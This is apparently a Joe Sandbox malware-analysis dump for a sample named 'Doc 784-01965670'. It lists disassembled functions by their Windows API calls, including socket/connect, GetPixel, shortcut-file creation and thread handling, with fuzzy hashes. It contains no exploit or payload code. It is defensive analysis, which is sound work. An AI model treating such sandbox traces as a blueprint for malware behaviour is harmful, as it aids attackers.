                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                                    • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                                                                                    • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                                                                                    APIs
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00445721
                                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                                                                                    • _wcslen.LIBCMT ref: 004457A3
                                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                                    • API String ID: 3087257052-0
                                                                                                                                    • Opcode ID: 07a683c3f77dae50ee773e7e3fa5154241049f7b31449e9a489b3be5124be6a3
                                                                                                                                    • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                                                                                    • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                                                                                    APIs
                                                                                                                                    • IsWindow.USER32(00000000), ref: 00459DEF
                                                                                                                                    • GetForegroundWindow.USER32 ref: 00459E07
                                                                                                                                    • GetDC.USER32(00000000), ref: 00459E44
                                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                                    • API String ID: 4156661090-0
                                                                                                                                    • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                                    • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                                                                                    • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00464985
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                                                                                    • connect.WSOCK32(00000000,00000000,00000010), ref: 004649CD
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00464A07
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                                    • API String ID: 245547762-0
                                                                                                                                    • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                                                                    • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                                                                                    • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                                                                                    APIs
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                    • BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                                    • API String ID: 2338827641-0
                                                                                                                                    • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                                    • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                                                                                    • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                                    • API String ID: 2875609808-0
                                                                                                                                    • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                                    • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                                                                                    • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32 ref: 0046FD00
                                                                                                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                                                                                    • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                                                                                    • DestroyIcon.USER32(?), ref: 0046FD58
                                                                                                                                    • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$DestroyIcon
                                                                                                                                    • API String ID: 3419509030-0
                                                                                                                                    • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                                    • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                                                                                    • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                                                                                    APIs
                                                                                                                                    • __getptd.LIBCMT ref: 004175AE
                                                                                                                                      • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                                      • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                                    • __amsg_exit.LIBCMT ref: 004175CE
                                                                                                                                    • __lock.LIBCMT ref: 004175DE
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                                                                                    • InterlockedIncrement.KERNEL32(02FA2D10), ref: 00417626
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4271482742-0
                                                                                                                                    • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                                    • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                                                                                    • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                                    • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$Icon
• String ID:
• API String ID: 4023252218-0
• Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
• Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
• Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
• Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00460342
• GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
• MessageBeep.USER32(00000000), ref: 0046036D
• KillTimer.USER32(?,0000040A), ref: 00460392
• EndDialog.USER32(?,00000001), ref: 004603AB
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
• Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
• Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
• Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
APIs
• SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: DeleteDestroyObject$IconMessageSendWindow
• String ID:
• API String ID: 1489400265-0
• Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
• Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
• Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
• Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
APIs
  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
• String ID:
• API String ID: 1042038666-0
• Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
• Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
• Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
• Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
APIs
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
• Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
• Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
• Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
APIs
  • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
• ___set_flsgetvalue.LIBCMT ref: 004140E1
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 004140EC
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004140FF
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
• ExitThread.KERNEL32 ref: 0041410F
• GetCurrentThreadId.KERNEL32 ref: 00414115
• __freefls@4.LIBCMT ref: 00414135
• __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 132634196-0
• Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
• Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
• Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
• Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
APIs
• __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
  • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
• __getptd_noexit.LIBCMT ref: 00415620
• CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
• __freeptd.LIBCMT ref: 0041563B
• ExitThread.KERNEL32 ref: 00415643
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
• String ID:
• API String ID: 3798957060-0
• Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
• Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                                                                                    • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                                    • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
APIs
  • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
• ___set_flsgetvalue.LIBCMT ref: 00415690
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 0041569B
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004156AD
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
• ExitThread.KERNEL32 ref: 004156BD
• __freefls@4.LIBCMT ref: 004156D9
• __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 1537469427-0
• Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
• Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
• Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
• Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: _malloc
• String ID: Default$|k
• API String ID: 1579825452-2254895183
• Opcode ID: 404d7240c4bb856f681ff9cdf52c8ed6758caabbd7f7f5126ad75ded5c77f63b
• Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
• Opcode Fuzzy Hash: 404d7240c4bb856f681ff9cdf52c8ed6758caabbd7f7f5126ad75ded5c77f63b
• Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: _memcmp
• String ID: '$[$h
• API String ID: 2931989736-1224472061
• Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
• Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
• Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
• Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: _strncmp
• String ID: >$R$U
• API String ID: 909875538-1924298640
• Opcode ID: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
• Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
• Opcode Fuzzy Hash: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
• Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
APIs
  • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
• CoInitialize.OLE32(00000000), ref: 0046CE18
• CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
• CoUninitialize.OLE32 ref: 0046CE50
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
• Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
• Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
• Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: _wcslen
• String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
• API String ID: 176396367-557222456
• Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
• Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
